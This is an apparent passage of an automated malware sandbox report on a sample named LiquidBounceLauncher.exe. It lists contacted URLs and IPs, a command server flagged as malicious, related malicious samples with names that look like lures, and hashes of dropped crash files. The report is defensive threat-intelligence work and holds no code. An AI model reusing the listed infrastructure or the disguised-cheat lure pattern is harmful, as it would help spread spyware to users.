                                                                                                                          http://tempuri.org/Entity/Id16AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/NonceAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://tempuri.org/Entity/Id17AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id18AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id5ResponseAppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id19AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsAppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://tempuri.org/Entity/Id10ResponseAppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RenewAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://tempuri.org/Entity/Id8ResponseAppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://support.google.com/chrome/?p=plugin_wmpAppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://support.google.com/chrome/answer/6258784AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high

                                                                                                                                            World Map of Contacted IPs

                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs

                                                                                                                                            Public IPs

                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            176.9.247.226
                                                                                                                                            		dl.uploadgram.meGermany
                                                                                                                                            		24940HETZNER-ASDEfalse
                                                                                                                                            185.106.92.73
                                                                                                                                            		unknownRussian Federation
                                                                                                                                            		50113SUPERSERVERSDATACENTERRUtrue

                                                                                                                                            Private

                                                                                                                                            IP
                                                                                                                                            192.168.2.1

                                                                                                                                            General Information

                                                                                                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                            Analysis ID:632538
                                                                                                                                            Start date and time: 23/05/202218:52:542022-05-23 18:52:54 +02:00
                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 11m 55s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:full
                                                                                                                                            Sample file name:LiquidBounceLauncher.exe
                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                            Number of analysed new started processes analysed:33
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • HDC enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@11/10@1/3
                                                                                                                                            EGA Information:
                                                                                                                                            • Successful, ratio: 75%
                                                                                                                                            HDC Information:
                                                                                                                                            • Successful, ratio: 39% (good quality ratio 37.4%)
                                                                                                                                            • Quality average: 81.7%
                                                                                                                                            • Quality standard deviation: 25.3%
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 92%
                                                                                                                                            • Number of executed functions: 115
                                                                                                                                            • Number of non-executed functions: 62
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                            • Adjust boot time
                                                                                                                                            • Enable AMSI

                                                                                                                                            Warnings

                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
                                                                                                                                            • Execution Graph export aborted for target AppLaunch.exe, PID 4616 because it is empty
                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                            Simulations

                                                                                                                                            Behavior and APIs

                                                                                                                                            TimeTypeDescription
                                                                                                                                            18:54:20API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                            18:54:46API Interceptor52x Sleep call for process: AppLaunch.exe modified

                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                            IPs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                            176.9.247.226XFxFVUt49K.exeGet hashmaliciousBrowse
                                                                                                                                              n2vBPxeTmB.exeGet hashmaliciousBrowse
                                                                                                                                                setup.exeGet hashmaliciousBrowse
                                                                                                                                                  Roblox pet simulator autofarm installer.exeGet hashmaliciousBrowse
                                                                                                                                                    Installer.exeGet hashmaliciousBrowse
                                                                                                                                                      fRiAEi7mIg.exeGet hashmaliciousBrowse
                                                                                                                                                        VBC6sOuJdJ.exeGet hashmaliciousBrowse
                                                                                                                                                          Setup.exeGet hashmaliciousBrowse
                                                                                                                                                            ChuS86YDQv.exeGet hashmaliciousBrowse
                                                                                                                                                              o9lgHgNy59.exeGet hashmaliciousBrowse
                                                                                                                                                                jOvv9gIY52.exeGet hashmaliciousBrowse
                                                                                                                                                                  83409832.exeGet hashmaliciousBrowse
                                                                                                                                                                    85844619.exeGet hashmaliciousBrowse
                                                                                                                                                                      LGaHSLlBZw.exeGet hashmaliciousBrowse
                                                                                                                                                                        61594862.exeGet hashmaliciousBrowse
                                                                                                                                                                          95321840.exeGet hashmaliciousBrowse
                                                                                                                                                                            S5NBBqaQzD.exeGet hashmaliciousBrowse
                                                                                                                                                                              Oj0sqPv8dP.exeGet hashmaliciousBrowse
                                                                                                                                                                                55871001.exeGet hashmaliciousBrowse
                                                                                                                                                                                  44958191.exeGet hashmaliciousBrowse

                                                                                                                                                                                    Domains

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    dl.uploadgram.meXFxFVUt49K.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    n2vBPxeTmB.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    setup.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    Roblox pet simulator autofarm installer.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    Installer.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    fRiAEi7mIg.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    VBC6sOuJdJ.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    ChuS86YDQv.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    o9lgHgNy59.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    jOvv9gIY52.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    83409832.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    85844619.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    LGaHSLlBZw.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    61594862.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    95321840.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    S5NBBqaQzD.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    Oj0sqPv8dP.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    55871001.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    44958191.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    34667994.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226

                                                                                                                                                                                    ASNs

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    SUPERSERVERSDATACENTERRUAFAC7896CF21983233C533EEAEC870610856969D98218.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.112.83.172
                                                                                                                                                                                    3jjcoHwLToGet hashmaliciousBrowse
                                                                                                                                                                                    • 45.144.98.139
                                                                                                                                                                                    exC19CF98t.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.189.13.231
                                                                                                                                                                                    JxMLJZTzZbGet hashmaliciousBrowse
                                                                                                                                                                                    • 45.144.98.145
                                                                                                                                                                                    j44cWf8U2y.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 84.252.75.80
                                                                                                                                                                                    sTQ7q7aDPH.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.17.0.37
                                                                                                                                                                                    Z1ZqDlfQTk.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.17.0.67
                                                                                                                                                                                    Loader.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.112.83.228
                                                                                                                                                                                    zzWaOkn277.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.112.83.46
                                                                                                                                                                                    JD0W2lLYbM.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.112.83.46
                                                                                                                                                                                    oH1NlspbdYGet hashmaliciousBrowse
                                                                                                                                                                                    • 45.144.98.138
                                                                                                                                                                                    vg2QKB2uAf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.189.14.66
                                                                                                                                                                                    629_1648146617_8324.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.188.182.126
                                                                                                                                                                                    90948875.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.233.200.90
                                                                                                                                                                                    95531254.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.174.136.104
                                                                                                                                                                                    83098289.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.233.200.90
                                                                                                                                                                                    58988127.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.233.200.90
                                                                                                                                                                                    62749029.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.174.136.104
                                                                                                                                                                                    63071203.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.112.83.122
                                                                                                                                                                                    67609602.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.112.83.136
                                                                                                                                                                                    HETZNER-ASDEhttps://tinyurl.com/3wjpcxnyGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.243.134.97
                                                                                                                                                                                    https://t.co/BF7mHqnqDeGet hashmaliciousBrowse
                                                                                                                                                                                    • 95.217.193.11
                                                                                                                                                                                    Swift,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 78.46.5.205
                                                                                                                                                                                    setup.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.147.148
                                                                                                                                                                                    Josho.x86Get hashmaliciousBrowse
                                                                                                                                                                                    • 136.243.43.34
                                                                                                                                                                                    6523.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 95.217.244.73
                                                                                                                                                                                    file2.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 148.251.234.93
                                                                                                                                                                                    SecuriteInfo.com.Trojan.DownLoader44.60969.9814.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 168.119.191.106
                                                                                                                                                                                    Setup.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 148.251.234.93
                                                                                                                                                                                    File.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 148.251.234.93
                                                                                                                                                                                    RFQ-Order List.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 135.181.70.92
                                                                                                                                                                                    7uvkuUP9Ki.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 46.4.27.39
                                                                                                                                                                                    CEMHhBX6t5.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 148.251.234.83
                                                                                                                                                                                    mz9kbuCovJ.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 148.251.234.83
                                                                                                                                                                                    Kjp4Tz2HHeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.143.4
                                                                                                                                                                                    F42E768EAF5BBDE818DFA4A2B00B1BC53D2E8365F646E.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 148.251.234.83
                                                                                                                                                                                    I6qCI4iExUGet hashmaliciousBrowse
                                                                                                                                                                                    • 78.47.94.103
                                                                                                                                                                                    GeeX7BzYmpGet hashmaliciousBrowse
                                                                                                                                                                                    • 95.217.66.191
                                                                                                                                                                                    ZXcGOtlPnA.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 148.251.234.83
                                                                                                                                                                                    SecuriteInfo.com.Variant.Lazy.173771.29792.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 95.217.250.17

                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0ecsgo aimlock v2.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    Avviso di pagamento.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    56516426-056C-4DBA-984B-979F68AB8D18 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    W7oufZXmaP.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    4y4FfA8KgX.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    f8.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    Ginzo.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    https://r20.rs6.net/tn.jsp?f=001yFlB4wfS4yfGniO1AQVCxhBc5kOFWnbRCzFZlC4CWdUzpfK8iAi_l_yxShGPy64Osjv16qtHH7dAfIvPs-kLVCbkFH2c96r-vfNxux2DBBoXHWTdpqtfVsv3YBkveI4-lLQjkxESuzO9ZofwuiOHWTcjEl0BdQ0w&c=jXQDBUHhHCRmG6UE_jNriAGRC5DJqaKF_6tewCiw_CLnHTqva2lElQ==&ch=0a6ZPpMSr-1BDyUlhNcZcExWH-qP6B_-UQR8filflxiZ58mn_hXkjA==&_e=hanna.hartnett@atlanticare.org&data=05%7C01%7Channa.hartnett@atlanticare.org%7C93bc28fa49e9463aabe008da3cbe10af%7C9192df1d303c4bcba026d2bf09651357%7C0%7C0%7C637889084271803112%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C2000%7C%7C%7C&sdata=mUmfXHc7Y8X8HnyG115aJZykFwxsoY9nY1U5ishho0Y=&reserved=0Get hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    SecuriteInfo.com.W32.AIDetectNet.01.3392.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    setup.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    Inquiry_List & Data sheet.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    wam.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    Req. Quote_28042022.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    RFQ-SIGNAL S.A 17.05.2022.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    https://clinicanaissance.com.br/ourd/eintGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    ungziped_file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    Shipping Documents_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    REF AMVK22-3480.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    SecuriteInfo.com.Trojan.DownLoader44.60969.9814.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226
                                                                                                                                                                                    RFQ # 1040377 & Drawings.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 176.9.247.226

                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                    No context

                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_LiquidBounceLaun_b4f9233ab61b34253b4323d53747c842a2892_bb657904_04fa86c5\Report.wer

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                    Entropy (8bit):0.8801599390739993
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:whB6ktVUHBUZMXAjetq/u7sjS274ItUr:PktVcBUZMXAjeQ/u7sjX4ItUr
                                                                                                                                                                                    MD5:952FFC43199F1974FBD611E429F3BBEE
                                                                                                                                                                                    SHA1:9205CD06EA615D249A721A782D48B10D1B34EA34
                                                                                                                                                                                    SHA-256:810AC62079015256B175AE2F0619DAE3FBEB15A4668C689B395EFE667B2422DE
                                                                                                                                                                                    SHA-512:794A2090E88E78D3896BEFC84D0EED1F247154AA41012C70556BDD890439FB9FD206B0AEDE2D3DD7DF20AE2D77E890DCAC3E05F52B16BE5153E0D7E0E0056BF2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.7.9.8.4.5.3.4.9.6.3.8.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.7.9.8.4.5.5.7.9.3.2.3.5.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.f.1.d.a.7.8.5.-.c.f.a.f.-.4.7.2.c.-.8.6.8.2.-.4.8.b.a.e.7.1.9.3.a.1.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.5.b.d.6.5.1.-.5.b.a.a.-.4.6.4.8.-.9.8.1.6.-.5.3.1.6.d.5.c.4.d.a.8.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.i.q.u.i.d.B.o.u.n.c.e.L.a.u.n.c.h.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.2.8.-.0.0.0.1.-.0.0.1.c.-.6.4.9.a.-.e.e.b.3.c.5.6.e.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.6.a.d.8.0.4.3.4.c.f.6.8.3.d.3.8.a.9.b.c.0.9.e.a.5.b.9.0.b.7.6.0.0.0.0.f.f.f.f.!.0.0.0.0.9.0.1.6.8.3.a.a.4.b.d.e.f.5.5.2.7.b.6.9.4.8.4.d.e.7.a.9.1.a.3.0.e.9.1.3.4.8.f.0.!.L.i.q.u.i.d.B.o.u.n.c.e.L.a.u.

                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Tempsvchost.exe_47485259fa2fe91b22eefff99ee659f6163bac7_70cd5a86_1b5f7a5c\Report.wer

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                    Entropy (8bit):0.8723296437837158
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:fYJDxHp8oHBUZMXYjetq/u7s5S274Ite:wJ9J8QBUZMXYjeQ/u7s5X4Ite
                                                                                                                                                                                    MD5:86967CBAC740456D8A5F7C78DD97D151
                                                                                                                                                                                    SHA1:A48A2FBEEFE332091AA780662B920B4BE0B7B354
                                                                                                                                                                                    SHA-256:E295E443AD7283B152226C87E01EBA5710A8F28E87AC7054A0E82D1295A3D30F
                                                                                                                                                                                    SHA-512:5C06925597F4D21F989D63B0A2CE319D0F8F3B7FF46D86F8AABE83F09816BDA48BD4320DDF81C382305EF5F26A8639D617B3EA881E28033F7F7BD562CA22EB71
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: SUSP_WER_Suspicious_Crash_Directory, Description: Detects a crashed application executed in a suspicious directory, Source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Tempsvchost.exe_47485259fa2fe91b22eefff99ee659f6163bac7_70cd5a86_1b5f7a5c\Report.wer, Author: Florian Roth
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.7.9.8.5.1.9.0.4.8.5.4.9.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.7.9.8.5.2.1.0.4.8.5.5.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.0.2.0.e.d.0.-.a.6.1.3.-.4.2.e.7.-.a.6.8.3.-.d.2.9.4.5.8.3.a.9.9.1.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.d.2.b.0.a.5.5.-.4.c.f.a.-.4.2.1.6.-.9.f.4.7.-.5.9.2.9.7.d.8.8.a.1.9.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.T.e.m.p.s.v.c.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.b.c.-.0.0.0.1.-.0.0.1.c.-.a.d.9.b.-.1.0.d.2.c.5.6.e.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.2.e.d.1.7.5.5.5.9.9.b.6.4.4.7.3.1.e.6.f.7.c.b.b.2.b.c.6.5.3.3.0.0.0.0.f.f.f.f.!.0.0.0.0.6.8.3.6.2.d.6.4.a.2.c.8.7.0.e.3.3.0.c.a.3.9.a.6.8.8.f.e.6.9.3.4.b.6.0.c.1.6.3.6.!.T.e.m.p.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.e.t.A.

                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D03.tmp.dmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Mon May 23 16:54:14 2022, 0x1205a4 type
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):29238
                                                                                                                                                                                    Entropy (8bit):2.4164239344903233
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:mcz3D2trGuQV12O5SkxvWJNfosBiF03sIiQ/DY4rCO:lfp5Lxv8NfojFus/
                                                                                                                                                                                    MD5:5799D6FD5BCF490C82C124A4D67B42CF
                                                                                                                                                                                    SHA1:EB17DE494C66105CCAB3E9E175759E32AD1FC72E
                                                                                                                                                                                    SHA-256:A73570DE47D480FF19E16A1B95AD97E79C812C29CFF48C3FF4A4A1E8EF7269B3
                                                                                                                                                                                    SHA-512:CD3379C7AAEABE5DACEA90107DC16A8780E485E14C448F42EC1E282ED155D53565DF95C6D0839888841B2DA7974F4088970A714E256BB888AFDFE92EB71152D8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:MDMP....... .......6..b............4...........x...<.......T...^$..........T.......8...........T................X...........................................................................................U...........B......8.......GenuineIntelW...........T.......(...)..b.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D0E.tmp.dmp

                                                                                                                                                                                    Download File
